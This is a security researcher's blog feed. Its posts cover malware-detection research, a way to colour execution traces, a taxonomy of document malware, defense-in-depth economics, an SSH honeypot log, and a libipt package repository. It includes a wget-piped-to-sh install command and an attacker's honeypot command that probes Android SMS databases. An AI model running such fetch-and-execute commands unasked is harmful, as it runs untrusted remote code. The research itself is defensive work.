(ISC'19)2019-06-08T15:30:00-04:002019-06-08T15:30:00-04:00Carter Yagemanntag:carteryagemann.com,2019-06-08:/isc-19.html<p>My coauthors and I will be presenting a paper in the <a href="https://isc2019.cs.stonybrook.edu/">22nd Information Security Conference</a> (ISC'19)
in September.
Below is a preview:</p>
<p><strong><a href="https://carteryagemann.com/pages/barnum.html">Project Page</a></strong></p>
<p><strong>Title:</strong> Barnum: Detecting Document Malware via Control Flow Anomalies in Hardware Traces.</p>
<p><strong>Authors:</strong> Carter Yagemann (Georgia Tech), Salmin Sultana (Intel Labs), Li Chen (Intel Labs), Wenke …</p><p>My coauthors and I will be presenting a paper in the <a href="https://isc2019.cs.stonybrook.edu/">22nd Information Security Conference</a> (ISC'19)
in September.
Below is a preview:</p>
<p><strong><a href="https://carteryagemann.com/pages/barnum.html">Project Page</a></strong></p>
<p><strong>Title:</strong> Barnum: Detecting Document Malware via Control Flow Anomalies in Hardware Traces.</p>
<p><strong>Authors:</strong> Carter Yagemann (Georgia Tech), Salmin Sultana (Intel Labs), Li Chen (Intel Labs), Wenke Lee (Georgia Tech).</p>
<p><strong>Abstract:</strong> This paper proposes Barnum, an offline control flow attack detection system that applies deep learning
on hardware execution traces to model a program's behavior and detect control flow anomalies.
Our implementation analyzes document readers to detect exploits and ABI abuse.
Recent work has proposed using deep learning based control flow classification to build more
robust and scalable detection systems.
These proposals, however, were not evaluated against different kinds of control flow attacks,
programs, and adversarial perturbations.</p>
<p>We investigate anomaly detection approaches to improve the security coverage and scalability of
control flow attack detection. Barnum is an end-to-end system consisting of three major components:
1) trace collection, 2) behavior modeling, and 3) anomaly detection via binary classification.
It utilizes Intel<sup>®</sup> Processor Trace for low overhead execution tracing and
applies deep learning on the basic block sequences reconstructed from the trace to train a normal program behavior model.
Based on the path prediction accuracy of the model, Barnum then determines a decision boundary to classify benign vs. malicious executions.</p>
<p>We evaluate against 8 families of attacks to Adobe Acrobat Reader and 9 to Microsoft Word on Windows 7.
Both readers are complex programs with over 50 dynamically linked libraries, just-in-time compiled code
and frequent network I/O. Barnum shows its effectiveness with <strong>0% false positive</strong> and <strong>2.4% false negative</strong>
on a dataset of 1,250 benign and 1,639 malicious PDFs.
Barnum is robust against evasion techniques as it successfully detects 500 adversarially perturbed PDFs.</p>Extended Abstract to Appear in CVPR-19 Workshop on Explainable AI2019-04-26T17:00:00-04:002019-04-26T17:00:00-04:00Carter Yagemanntag:carteryagemann.com,2019-04-26:/cvpr-19-xai.html<p>My coauthors and I will be presenting an extended abstract in the workshop on
<a href="https://explainai.net/">Explainable AI</a> at <a href="http://cvpr2019.thecvf.com/">CVPR 2019</a> in June.
Below is a preview:</p>
<p><strong>Title:</strong> To believe or not to believe: Validating explanation fidelity for dynamic malware analysis.</p>
<p><strong>Authors:</strong> Li Chen (Intel Labs), Carter Yagemann (Georgia Tech), Evan Downing …</p><p>My coauthors and I will be presenting an extended abstract in the workshop on
<a href="https://explainai.net/">Explainable AI</a> at <a href="http://cvpr2019.thecvf.com/">CVPR 2019</a> in June.
Below is a preview:</p>
<p><strong>Title:</strong> To believe or not to believe: Validating explanation fidelity for dynamic malware analysis.</p>
<p><strong>Authors:</strong> Li Chen (Intel Labs), Carter Yagemann (Georgia Tech), Evan Downing (Georgia Tech).</p>
<p><strong>Abstract:</strong> Converting malware into images followed by vision-based deep learning algorithms has shown superior threat detection efficacy compared with classical machine learning algorithms. When malware are visualized as images, visual-based interpretation schemes can also be applied to extract insights of why individual samples are classified as malicious. In this work, via two case studies of dynamic malware classification, we extend the local interpretable model-agnostic explanation algorithm to explain image-based dynamic malware classification and examine the interpretation fidelity. For both case studies, we first train deep learning models via transfer learning on malware images, demonstrate high classification effectiveness, apply an explanation method on the images, and correlate the results back to the samples to validate whether the algorithmic insights are consistent with security domain expertise. In our first case study, the interpretation framework identifies indirect calls that uniquely characterize the underlying exploit behavior of a malware family. In our second case study, the interpretation framework extracts insightful information such as cryptography-related APIs when applied on images created from API existence, but generate ambiguous interpretation on images created from API sequences and frequencies. Our findings indicate that current image-based interpretation techniques are promising for vision-based malware classification. We continue to develop image-based interpretation schemes specifically for security applications.</p>H&R Block App Analytics for 20192019-04-12T13:00:00-04:002019-04-12T13:00:00-04:00Carter Yagemanntag:carteryagemann.com,2019-04-12:/hrb-analytics-2019.html<p>Last year I wrote a <a href="https://carteryagemann.com/hrb-analytics.html">blog post</a> about using
the analytics publicly released by the USA government to gleam some information
about H&R Block's mobile apps. If you haven't read it, I recommend doing so
because in this post I'm going to give an update for the 2019 tax …</p><p>Last year I wrote a <a href="https://carteryagemann.com/hrb-analytics.html">blog post</a> about using
the analytics publicly released by the USA government to gleam some information
about H&R Block's mobile apps. If you haven't read it, I recommend doing so
because in this post I'm going to give an update for the 2019 tax year.</p>
<p>I haven't changed the code or data source, so check the original blog post for
those and as I previously mentioned, I've been collecting this data since 2016
and I'm happy to share upon request.</p>
<h2>Results</h2>
<p>Here are the results for 2019, in no particular order:</p>
<ul>
<li>From January 13 through April 11, <strong>497</strong> requests were made by MyBlock and <strong>334,960</strong> by Taxes.</li>
<li><strong>322,749</strong> requests were made from phones while <strong>12,708</strong> were tablets; about
<strong>96%</strong> of the requests were phones.</li>
<li><strong>100%</strong> of requests were made by devices running iOS.</li>
<li>Three versions of MyBlock appear in the dataset: <strong>6.6.0</strong>, <strong>6.8.0</strong>, and <strong>7.0.1</strong>.</li>
<li>Seven versions of Taxes appear in the dataset: <strong>7.7.1</strong>, <strong>7.8.0</strong>, <strong>8.1.0</strong>, <strong>8.2.0</strong>, <strong>8.3.0</strong>, <strong>8.5.0</strong>, and <strong>8.6.0</strong>.</li>
<li><strong>100%</strong> of requests contain "Mozilla" in the user-agent.</li>
</ul>
<p>And the security question from the original blog post:</p>
<ul>
<li><strong>197,548</strong> requests used TouchID, <strong>88,094</strong> FaceID,
and <strong>49,815</strong> showed neither keyword;
<strong>59%</strong>, <strong>26%</strong>, and <strong>15%</strong>, respectively.</li>
</ul>
<h2>Comparison to 2018</h2>
<ul>
<li>Whereas in 2018 the vast majority of requests were made by MyBlock, in 2019 almost all requests were made by Taxes.</li>
<li>No requests by Android devices appear in 2019.</li>
<li>The change in usage of TouchID, FaceID, and neither is <strong>-15%</strong>, <strong>19%</strong>, and <strong>-4%</strong>, respectively.</li>
</ul>
<h2>Discussion</h2>
<p>It's interesting that no requests were made from Android devices in 2019.
The MyBlock app is listed on the <a href="https://play.google.com/store/apps/details?id=com.hrblock.blockmobile">Play store</a>,
so why don't they appear in the data? One possibility is they no longer use a special user agent. Another is
they no longer communicate with a USA government website contained in the public analytic data. It's hard to know
for certain what the root cause is.</p>
<p>We can also see that the usage of FaceID is rising at a cost to both of the other categories. This implies conversions came
from both existing TouchID users and new adopters. The shift makes sense as more FaceID compatible phones reach customer
hands. It'll be interesting to see if this trend continues in 2020 or if the adoption of Apple's biometric features reaches premature saturation.</p>Android Intent Firewall Documentation2019-04-06T10:00:00-04:002019-04-06T10:00:00-04:00Carter Yagemanntag:carteryagemann.com,2019-04-06:/intent-firewall-doc.html<p>Awhile ago I was notified that the <a href="https://web.archive.org/web/20180621163836/http://www.cis.syr.edu/~wedu/android/IntentFirewall/">documentation</a>
on Android's Intent Firewall that I wrote while I was a student at Syracuse University is no longer available. Surprisingly, despite how old the
document is, I still get requests for it. Thus, I've taken the time to make a copy of …</p><p>Awhile ago I was notified that the <a href="https://web.archive.org/web/20180621163836/http://www.cis.syr.edu/~wedu/android/IntentFirewall/">documentation</a>
on Android's Intent Firewall that I wrote while I was a student at Syracuse University is no longer available. Surprisingly, despite how old the
document is, I still get requests for it. Thus, I've taken the time to make a copy of it on this website for preservation. You can access it
<a href="https://carteryagemann.com/pages/android-intent-firewall.html">here</a>.</p>Malware Has a Color2019-02-21T21:00:00-05:002019-02-21T21:00:00-05:00Carter Yagemanntag:carteryagemann.com,2019-02-21:/malware-colors.html<p>In an upcoming paper I plan to present some preliminary work in applying machine learning
to program control flows to detect anomalies. Specifically, my coauthors and I demonstrate
how to use this to analyze document malware with promising accuracy. In
<a href="https://carteryagemann.com/doc-mal-categories.html">previous posts</a>, I've detailed the threat malicious documents
pose to …</p><p>In an upcoming paper I plan to present some preliminary work in applying machine learning
to program control flows to detect anomalies. Specifically, my coauthors and I demonstrate
how to use this to analyze document malware with promising accuracy. In
<a href="https://carteryagemann.com/doc-mal-categories.html">previous posts</a>, I've detailed the threat malicious documents
pose to users and shared some insights into why this problem remains prevalent. For this post,
I want to switch gears and share a fun technique I use to help understand
what the control flow anomaly detector is really seeing. Put playfully, I'm going to demonstrate how
to spot malware by the color it makes. Enjoy.</p>
<p>Without going into too many details about the system (I'll be sure to make a post about where to
find the paper and code when it becomes available), at a high level we collect and use execution traces of a target
program (e.g. Acrobat Reader) opening benign documents to create a path prediction
model. We then use the model on an unlabeled trace with the intuition being that any occurring anomalies
will cause a sudden drop in prediction accuracy. There's a little more to it than that, but this is the gist
of how the system operates.</p>
<p>One challenge with such a system is the traces are massive. Even if we narrow our focus to
only indirect control flow transfers (e.g. <code>ret</code>, <code>icall</code>, and <code>ijmp</code>), that's still thousands to
millions of events per minute of real time execution. This makes diagnosing whether there was a bug or
whether the malware simply didn't detonate a challenge.</p>
<p>One option is to manually analyze the malware sample, typically by running the virtual machine in another
framework. This is time consuming though, which is why I've come up with a niftier solution that involves
visualizing the trace in conjunction with the model's output. This is how I discovered that malware has a
color.</p>
<h2>Visualization Technique</h2>
<p>First, I convert each target address into a color by hashing it. For simplicity, I take the first three
bytes of a <code>md5</code> hash to get a RGB tuple. The reason I use a secure hashing algorithm instead of a simple
checksum is so nearby addresses will create very different colors, creating contrast. Here's an example of
what a benign trace looks like:</p>
<p><center>
<img alt="Benign Trace" src="https://carteryagemann.com/images/vis-ben1.png">
</center></p>
<p>We can clearly see patterns, but there's no clear indicator of what makes one normal and another
anomalous. Let's compare with a family of PDF malware that the system is good at detecting: <code>pdfka</code>. Here's one
of the traces:</p>
<p><center>
<img alt="PDFKA Color Trace" src="https://carteryagemann.com/images/vis-pdfka1.png">
</center></p>
<p>Look at that streak of dark blue! What's going on there? Is this an exploit or simply a pattern our previous
example didn't capture? To find out, I create a second image where each target is a white pixel if the
model predicted it correctly and black if the prediction was wrong. Here's the result for the same
trace:</p>
<p><center>
<img alt="PDFKA Model Output" src="https://carteryagemann.com/images/vis-pdfka2.png">
</center></p>
<p>Looks like there's a streak of incorrect predictions that lines up with the dark blue, but let's confirm it
by subtracting the two images. This will cause areas of accurate prediction (white in the second image) to
become black while areas of incorrect predictions will keep their color from the first image. Here's the
result:</p>
<p><center>
<img alt="PDFKA Subtraction" src="https://carteryagemann.com/images/vis-pdfka3.png">
</center></p>
<p>Sure enough, that blue streak is an anomaly produced by <code>pdfka</code>. In fact, if we were to visualize all the <code>pdfka</code>
samples in our paper's evaluation dataset, we would find they all contain a blue streak. What the blue is really
visualizing is an exploit (<code>CVE-2010-0188</code>) being carried out against the TIFF parser library in <code>AcroRd32.dll</code>.
Therefore, we can say the color of <code>pdfka</code> is dark blue!</p>
<h2>Other Examples</h2>
<p>To demonstrate the value of subtracting, consider this visualization of opening a Microsoft Word document:</p>
<p><center>
<img alt="MS Word Trace" src="https://carteryagemann.com/images/vis-msword1.png">
</center></p>
<p>You may be tempted to conclude this is a red malware (since coming up with this technique, I've been referring
to malware by their colors instead of family names for fun), but it's actually benign. We can see this in
the subtraction:</p>
<p><center>
<img alt="MS Word Subtraction" src="https://carteryagemann.com/images/vis-msword2.png">
</center></p>
<p>No colors means no anomalies. Now let's see a trace of <code>hancitor</code>:</p>
<p><center>
<img alt="Hancitor" src="https://carteryagemann.com/images/vis-hancitor.png">
</center></p>
<p>As you can see, it's green malware. Meanwhile <code>thus</code> is blue-purple:</p>
<p><center>
<img alt="Thus" src="https://carteryagemann.com/images/vis-thus.png">
</center></p>
<p>I think that's enough examples to make my point. I hope you've been convinced that malware has a color.
Thanks for reading and happy hacking!</p>Upcoming MLsploit Demo at Black Hat Asia 20192019-01-17T17:00:00-05:002019-01-17T17:00:00-05:00Carter Yagemanntag:carteryagemann.com,2019-01-17:/bh-asia-19.html<p>A framework I helped develop called MLsploit will be demoed at Black Hat Asia 2019.
You can read more about it <a href="https://www.blackhat.com/asia-19/arsenal/schedule/index.html#mlsploit-a-cloud-based-framework-for-adversarial-machine-learning-research-14256">here</a>.</p>Three Kinds of Document Malware and Designing Frameworks to Detect Them2018-12-27T12:00:00-05:002018-12-27T12:00:00-05:00Carter Yagemanntag:carteryagemann.com,2018-12-27:/doc-mal-categories.html<p>Lately I've been spending a lot of time with document malware and exploring
techniques for detection. Malicious documents pose interesting challenges and
have become the typical first vector for adversaries to achieve a
foothold. Despite this, document malware seems largely overlooked by academics
compared to their executable counterparts. In short …</p><p>Lately I've been spending a lot of time with document malware and exploring
techniques for detection. Malicious documents pose interesting challenges and
have become the typical first vector for adversaries to achieve a
foothold. Despite this, document malware seems largely overlooked by academics
compared to their executable counterparts. In short, it's an area worth
exploring.</p>
<p>As I compared the current detection techniques, I noticed the pros and cons
are nuanced. Static analysis is quick and accurate, but very vulnerable to
evasion via adversarial perturbation. Dynamic analysis is slower and error
prone because samples can fail to trigger, but produce richer data.
These characteristics are further amplified by the use of machine learning.
Adding junk bytes between the elements of a PDF can evade a static feature
learner <a href="http://www.ra.cs.uni-tuebingen.de/mitarb/srndic/srndic-laskov-sp2014.pdf">in seconds</a>.
Unfortunately, dynamic features don't fare much <a href="https://evademl.org/docs/evademl.pdf">better</a>.</p>
<p>In time I've begun to formulate a theory that <em>there are currently three kinds of document malware</em>.
By applying this insight, I find I can substantially influence the results of
my experiments. While not as conclusive as something like a double disassociation,
I want to share what I've observed in hopes that it'll inspire others when designing
their detection systems and provoke feedback.</p>
<p>So without further ado, here's my theory. Currently, there are three kinds of
document malware: <strong>exploit-based, abuse-based, and phishing-based</strong>.
While I propose categories, note that they are not mutually exclusive.
Malware authors can always chain and blend
techniques to achieve their goals. Therefore, these categories should be seen as
points on a spectrum. That said, complexity invites failure, so I do not expect
real world authors to stray far from these focal points.
The following paragraphs elaborate on each category in reverse order.</p>
<h3>Phishing-based</h3>
<p>This is the trickiest category for a computer scientist because humans are
complicated and confusing entities. The exemplar of this category is a document
that tries to convince the user to take some compromising action. There may be
a link to a fake website or steps that lead to disabling a security feature.
Admittedly, this is a category I currently steer clear of.
<em>The best solutions are better education, stronger polices, and a clear strategy for recovery when a human mistake in inevitably made.</em>
Also note that this category
is the most likely to be chained with others. For example, a document may need
to lure the victim into clicking a button before a payload can be used. In rare
cases, user interaction may even be leveraged to thwart automated analysis.
Thankfully, I have yet to see a malware author embed a CAPTCHA in their document.</p>
<h3>Abuse-based</h3>
<p>This category does not consider the human user, but distinguishes itself
in how it uses the target application. The exemplar here
is a PDF containing JavaScript or a Word document with macros that uses provided
APIs to download and execute additional malware. The key point to emphasize here
is these documents do not violate the specification of the application.
<em>The program is functioning as intended.</em> This is why I label these instances
as abuse rather than exploitation. This distinction is critical to consider when
designing a detection framework. On the one hand, they're tricky because they
blend in with benign behavior. This is why, for example, looking at system call
sequences is a bad idea for this category. On the other hand, since the program's
integrity isn't compromised, it's safe to make strong assumptions in these
situations. <em>This is where static analysis is best suited.</em> Designed
correctly, such frameworks can leverage strong models of the target program to
accurately and statically detect abuse. This saves resources and minimizes exposure to
noise.</p>
<h3>Exploit-based</h3>
<p>Which brings us to the last category. Here's were we see the stuff 0-days and CVEs
are made from. It's also where all corners of the security community like to
flaunt their technical knowhow with intricate ROP chains and compact shellcode.
Jargon aside,
<em>this category differs from abuse-based in that it does violate the program's specification.</em>
Memory corruption, underflows, overflows, and more are all fair game for achieving
arbitrary code execution. This means the author's attacks can take unusual forms,
like malformed images, and detection frameworks have to cope. For this reason,
<em>this is where dynamic analysis overtakes static.</em> Because exploits by definition
break models and assumptions, the only way towards proactive detection is to actually
trigger them.</p>
<p>I hope readers find this categorization useful. Note that this is not the only way document
malware can be divided. For example, payloads can execute inside the target
application or in a separate process, creating a spectrum of <em>intrinsic</em> verses
<em>extrinsic</em> behaviors. Regardless, my three category theory has helped me design novel
systems and interpret the evaluation results, so I wanted to share it.</p>
<p>Thanks for reading.</p>Mention for Georgia Tech Vulnerability Disclosure2018-09-05T22:15:00-04:002018-09-05T22:15:00-04:00Carter Yagemanntag:carteryagemann.com,2018-09-05:/gatech-vuln-reporters.html<p>Georgia Tech has <a href="https://security.gatech.edu/vulnerability-reporters">acknowledged me</a> for
a past vulnerability I disclosed to them.</p>The Unfortunate Economics of Defense in Depth2018-08-14T23:30:00-04:002018-08-14T23:30:00-04:00Carter Yagemanntag:carteryagemann.com,2018-08-14:/economics-depth-defense.html<p><center>
<img alt="Castles benefit from defense in depth." src="https://carteryagemann.com/images/castle.jpg">
</center></p>
<p>A mantra we hear all the time in security is the notion of <strong>defense in depth</strong>.
It's applied in numerous areas from protecting computer systems to safeguarding airports.
Anyone who receives formal training in security will likely encounter the term at
least once in their coursework. It's a milestone we …</p><p><center>
<img alt="Castles benefit from defense in depth." src="https://carteryagemann.com/images/castle.jpg">
</center></p>
<p>A mantra we hear all the time in security is the notion of <strong>defense in depth</strong>.
It's applied in numerous areas from protecting computer systems to safeguarding airports.
Anyone who receives formal training in security will likely encounter the term at
least once in their coursework. It's a milestone we are told to strive for when
designing secure systems.</p>
<p>For readers who are unfamiliar with the term, it's the idea that when designing security into
a system, we should place several overlapping layers of defense wherever possible.
The insight behind this idea is that thwarting an attack only requires one layer of defense to
succeed whereas the attacker's success depends on penetrating every layer.
Consider, for example, an invading army storming a castle.
In order for the invasion to succeed, the invaders must survive raining arrows from archers,
traverse a moat, breach the castle walls, and kill the soldiers inside. Failure to surmount
any one of these defenses spells disaster for the attack. Worse yet for the invading army, as long
as each layer's chance of successfully halting the attack is independent from the other layers, adding more layers
makes the attacker's task more likely to fail. On the other hand, this is great news if
you are the one assigned to defend the castle.</p>
<p>Unfortunately, step outside the classroom and it will not take long to run into
the counterforce that stifles an otherwise brilliant concept. The force I am referring
to is <strong>economics</strong>. Defenses don't come for free and as I plan to highlight in this
blog post, there is a fundamental problem with applying <strong>defense in depth</strong> once <strong>economics</strong> enters
the equation.</p>
<p>To aid my explanation, let's use fair coin flips as a simple running example.
Although coins are a far cry from airports or castles, the underlying probabilities behind flipping
a coin are simple to understand and also sufficient to make my point.</p>
<p>As you are probably already
aware, a fair coin flip yields one of two possible outcomes, heads or tails, with equal and
mutually exclusive probabilities. The probability of getting heads once is 50%. Getting heads
twice in a row is 25%. Three times is 12.5%. This probability <em>p</em> is expressed by the following formula for <em>x</em> coin flips:</p>
<p><center>
<img alt="p = 1 / 2^x" src="https://carteryagemann.com/images/coin-flip-prob.jpg">
</center></p>
<p>If we graph this function for a couple of flips, we get the following figure:</p>
<p><center>
<img alt="Graph 1" src="https://carteryagemann.com/images/coin-flip-fig1.jpg">
</center></p>
<p>As we can see, the relationship between the number of flips and the probability is <strong>exponential</strong>.
Adding a few additional flips significantly impacts the probability of getting all heads at first, but
as even more flips are added, eventually the effect diminishes. In other words, the difference in
chance of getting two heads verses three is substantial, but the difference between 999 and
1,000 heads is comparatively minuscule. Tying this analogy back to security, if we map the outcome of heads
to the attacker successfully breaching a layer of security, we can see how overlapping a few defensive layers
can offer significantly better security and reduce the attacker's chance of success. However, with
each additional layer, the defender's gain diminishes. Regardless, this outcome shows that defense
in depth is fundamentally valuable and we can safely apply it in the real world as long as
the effectiveness of the layers being evaluated are completely (or at least nearly) independent to each other.</p>
<p>Unfortunately, as I alluded to in the introduction, every layer of defense has a cost to design, implement,
deploy, and maintain. If these costs are also completely (or at least nearly) independent, a problem arises.
Namely, each additional layer raises the cost of the overall defense <strong>linearly</strong>, but the return yielded
in security diminishes <strong>exponentially</strong>. Returning to our running example, now consider the case where each flip
costs one unit of resource to perform. If we add this function to our previous graph, we get the
following figure:</p>
<p><center>
<img alt="Graph 2" src="https://carteryagemann.com/images/coin-flip-fig2.jpg">
</center></p>
<p>And if we reformat this graph to show the proportional gain in cost to the gain in security, we get:</p>
<p><center>
<img alt="Graph 3" src="https://carteryagemann.com/images/coin-flip-fig3.jpg">
</center></p>
<p>Put plainly, the cost of using defense in depth to achieve <strong>decent</strong> security is relatively <strong>cheap</strong>, but
achieving <strong>exceptional</strong> security is extremely <strong>expensive</strong>. This is bad news for the defender and a
fundamental limitation to the idea of defense in depth.</p>
<p>Hopefully you now understand the title of this blog post and realize why this relationship is important
to grasp. For example, understanding this topic helps explain the controversies and debates surrounding
the cost of funding the Transportation Security Administration's twenty "Layers of Security" framework:</p>
<p><center>
<img alt="The TSA's Layers of Security." src="https://carteryagemann.com/images/tsa-layers.jpg">
</center></p>
<p>I'll forgo an in-depth analysis of this chart since other researchers have already examined it in
<a href="http://a.co/bSrRjVP">great detail</a>, but to summarize, if you pick a relevant threat to airport
security and consider each layer's effect on stopping it, you'll realize removing any one layer has
seemingly little impact on the overall risk of failure. This begs the question of whether there are layers that
can be removed to significantly reduce cost without significantly reducing security. Certainly an
idea worth exploring, if the science can be separated from the politics. Until then, I hope you've found this
blog post interesting and insightful.</p>Paper Accepted to ACM CCS 20182018-07-23T22:00:00-04:002018-07-23T22:00:00-04:00Carter Yagemanntag:carteryagemann.com,2018-07-23:/ccs18-publication.html<p>A paper I co-authored has been accepted to the <em>25th ACM Conference on Computer and
Communications Security</em> (CCS'18) being held in Toronto, Canada from October
15, 2018 to October 19, 2018.</p>
<p><strong>Title:</strong> Enforcing Unique Code Target Property for Control-Flow Integrity</p>
<p><strong>Authors:</strong> Hong Hu, Chenxiong Qian, <em>Carter Yagemann</em>, Simon Pak Ho …</p><p>A paper I co-authored has been accepted to the <em>25th ACM Conference on Computer and
Communications Security</em> (CCS'18) being held in Toronto, Canada from October
15, 2018 to October 19, 2018.</p>
<p><strong>Title:</strong> Enforcing Unique Code Target Property for Control-Flow Integrity</p>
<p><strong>Authors:</strong> Hong Hu, Chenxiong Qian, <em>Carter Yagemann</em>, Simon Pak Ho Chung,
Bill Harris, Taesoo Kim, Wenke Lee</p>
<p><strong>Abstract:</strong></p>
<p>The goal of control-flow integrity (CFI) is to stop control-hijacking attacks by ensuring that each indirect control-flow transfer (ICT) jumps to its legitimate target. However, existing implementations of CFI have fallen short of this goal because their approaches are inaccurate and as a result, the set of allowable targets for an ICT instruction is too large, making illegal jumps possible.</p>
<p>In this paper, we propose the Unique Code Target (UCT) property for CFI. Namely, for each invocation of an ICT instruction, there should be one and only one valid target. We develop a prototype called uCFI to enforce this new property. During compilation, uCFI identifies the sensitive instructions that influence ICT and instruments the program to record necessary execution context. At runtime, uCFI monitors the program execution in a different process, and performs points-to analysis by interpreting sensitive instructions using the recorded execution context in a memory safe manner. It checks runtime ICT targets against the analysis results to detect CFI violations. We apply uCFI to SPEC benchmarks and 2 servers (nginx and vsftpd) to evaluate its efficacy of enforcing UCT and its overhead. We also test uCFI against control-hijacking attacks, including 5 real-world exploits, 1 proof of concept COOP attack, and 2 synthesized attacks that bypass existing defenses. The results show that uCFI strictly enforces the UCT property for protected programs, successfully detects all attacks, and introduces less than 10% performance overhead.</p>Weird Things Are Afoot In The Honeypot2018-05-30T11:00:00-04:002018-05-30T11:00:00-04:00Carter Yagemanntag:carteryagemann.com,2018-05-30:/android-ssh.html<p>Here's something you don't see every day. The logs from my SSH honeypot show
someone brute-forcing the password for root and then executing:</p>
<div class="highlight"><pre><span></span><code>ls /data/data/com.android.providers.telephony/databases
</code></pre></div>
<p>This is a strange directory to look for because it's where Android devices
store the SQLite databases for SMS …</p><p>Here's something you don't see every day. The logs from my SSH honeypot show
someone brute-forcing the password for root and then executing:</p>
<div class="highlight"><pre><span></span><code>ls /data/data/com.android.providers.telephony/databases
</code></pre></div>
<p>This is a strange directory to look for because it's where Android devices
store the SQLite databases for SMS messages and contacts. Why would an attacker
except an SSH server on the internet to be an Android device? Are there IoT
devices based on Android that run SSH servers and also store contacts? If
someone knows, please tell me!</p>EFF and EFAIL: An Example of Hype Culture Gone Awry2018-05-14T21:30:00-04:002018-05-14T21:30:00-04:00Carter Yagemanntag:carteryagemann.com,2018-05-14:/eff-efail.html<p>I usually try to keep my blog posts technical and free of politics, but
I can't hide my frustration over EFF's response to today's release of the
<a href="https://efail.de/">EFAIL</a> vulnerability.</p>
<p>If you haven't heard by now, EFAIL is the
name of a vulnerability having to do with how email clients like …</p><p>I usually try to keep my blog posts technical and free of politics, but
I can't hide my frustration over EFF's response to today's release of the
<a href="https://efail.de/">EFAIL</a> vulnerability.</p>
<p>If you haven't heard by now, EFAIL is the
name of a vulnerability having to do with how email clients like Thunderbird handle PGP
encrypted emails. This vulnerability allows a strong adversary to decrypt
emails given that they have previously encrypted messages from a victim, can
tamper with emails in-transit, and assuming the victim's client is configured to
automatically fetch remote content.</p>
<p>I emphasize the word <em>strong</em> because
any security researcher can see that these preconditions mean this attack
is only a concern to individuals being targeted by nation-states.
As many Slashdot users and companies like ProtonMail
<a href="https://protonmail.com/blog/pgp-vulnerability-efail/">have pointed out</a>,
this vulnerability is over-hyped, blown out of proportion,
and the course of action being loudly proposed is somewhere between
draconian and moronic.</p>
<p>Unfortunately, it seems EFF is at the forefront of this
<a href="https://www.eff.org/deeplinks/2018/05/attention-pgp-users-new-vulnerabilities-require-you-take-action-now">crusade</a>
to misguide users. Within hours of the details being released,
EFF published a blog post advising everyone to immediately stop using PGP.
Since then, less than 24 hours later, EFF has published over <strong>13</strong> articles
driving home the "crisis" and providing step-by-step tutorials on how to
"take action" by
<a href="https://www.eff.org/deeplinks/2018/05/disabling-pgp-thunderbird-enigmail">disabling PGP</a>
and
<a href="https://www.eff.org/deeplinks/2018/05/using-command-line-decrypt-message-linux">decrypting emails</a>.
It is impressive that EFF has managed to write so much about EFAIL
in so little time.</p>
<p>As a security researcher, allow me to share a piece of wisdom echoed by many
of my peers. <em>The appropriate reaction to a vulnerability that can potentially
decrypt emails </em><em>is not</em><em> to start sending messages in plaintext</em>.
Sane people don't erase their operating system because of a bug, disable their
firewall because of a glitch, or stop using encryption because of a flawed
implementation. Decide how big of a risk EFAIL is to you, come up with a plan
for remediation based on that risk, and apply software patches when they become
available. For most users, this boils down to simply continuing your good security habits.
Disabling security in response to a bug is insanity.</p>
<p><strong>Shame on EFF for over-hyping vulnerabilities and giving terrible security advice!</strong></p>Debian Apt Repo for libipt2018-02-24T18:30:00-05:002018-02-24T18:30:00-05:00Carter Yagemanntag:carteryagemann.com,2018-02-24:/libipt-repo.html<p>As part of my Ph.D. research, I play around with Intel Processor Trace a lot.
As a result, I frequently use <a href="https://github.com/01org/processor-trace">libipt</a>;
both as a library for my own software and for the reference programs it includes.
<code>ptdump</code> and <code>ptxed</code> are my goto utilities for quickly checking and
manipulating …</p><p>As part of my Ph.D. research, I play around with Intel Processor Trace a lot.
As a result, I frequently use <a href="https://github.com/01org/processor-trace">libipt</a>;
both as a library for my own software and for the reference programs it includes.
<code>ptdump</code> and <code>ptxed</code> are my goto utilities for quickly checking and
manipulating traces. They're super useful!</p>
<p>Sadly on Debian and Ubuntu, the default package repositories only have a package
for the main library (no pre-compiled program binaries) that is woefully out
of date (last update was in 2016). Having to repeatably compile
<a href="https://github.com/intelxed/xed">xed</a> and
<a href="https://github.com/01org/processor-trace">libipt</a>
from source quickly got annoying, so I've decided to publish my own repository. I've
also made it public in hopes that others will find it useful.</p>
<p>The repository tracks the master branch on <a href="https://github.com/01org/processor-trace">libipt</a>
and <a href="https://github.com/intelxed/xed">xed</a>, so its packages should always contain
the latest code. I've made adding it to apt super easy:</p>
<div class="highlight"><pre><span></span><code>sh<span class="w"> </span>-c<span class="w"> </span><span class="s2">"</span><span class="k">$(</span>wget<span class="w"> </span>-qO<span class="w"> </span>-<span class="w"> </span>https://super.gtisc.gatech.edu/libipt.sh<span class="k">)</span><span class="s2">"</span>
</code></pre></div>
<p>It currently has the following libraries:</p>
<ul>
<li>libxed</li>
<li>libxed-dev</li>
<li>libipt (includes the sideband library)</li>
</ul>
<p>And the following pre-compiled programs:</p>
<ul>
<li>ptdump</li>
<li>pttc</li>
<li>ptxed</li>
</ul>
<p>More information about these libraries and programs is available in their respective
documentation. I hope to add more packages in the coming days.</p>
<p>For people interested in learning how to host their own repositories, I built this
server using <a href="https://www.gocd.org/">gocd</a>, <a href="https://www.aptly.info/">aptly</a>, and
<a href="https://httpd.apache.org/">apache</a>.</p>H&R Block "MyBlock" App + USA Government Website Analytics = PROFIT2018-02-09T16:00:00-05:002018-02-09T16:00:00-05:00Carter Yagemanntag:carteryagemann.com,2018-02-09:/hrb-analytics.html<p>I like data mining. For better or worse, it's the gold of the digital age. So
when the USA government decided to make the analytical data for their publicly
facing websites available for <a href="https://analytics.usa.gov/data/">download</a>, I
jumped at the opportunity. Thanks to this lovely data source, I can get
insights into …</p><p>I like data mining. For better or worse, it's the gold of the digital age. So
when the USA government decided to make the analytical data for their publicly
facing websites available for <a href="https://analytics.usa.gov/data/">download</a>, I
jumped at the opportunity. Thanks to this lovely data source, I can get
insights into how popular various browsers and operating systems are, how
frequently devices connect to USA government websites from foreign IP
address, and more.</p>
<p>Sadly, the website only offers metrics for the past 30 days. Luckily, it's
pretty easy to setup a raspberry pi or other small device to periodically fetch
the freshest numbers and build a larger dataset. This is what I've been doing
since August of 2016. <strong>If you're interested, send me an email and I'll be happy
to share</strong>. After all, according to the government's website: <em>"this website and
its data are free for you to use without restriction."</em></p>
<p>Continuing my story, I was skimming over the most recent metrics when I noticed
a funny browser user-agent:</p>
<div class="highlight"><pre><span></span><code>HRB-MOBILE-IOS-PHONE-MYBLOCK-TOUCHID-6.1.0-Mozilla
</code></pre></div>
<p>With a quick search, I figured out that
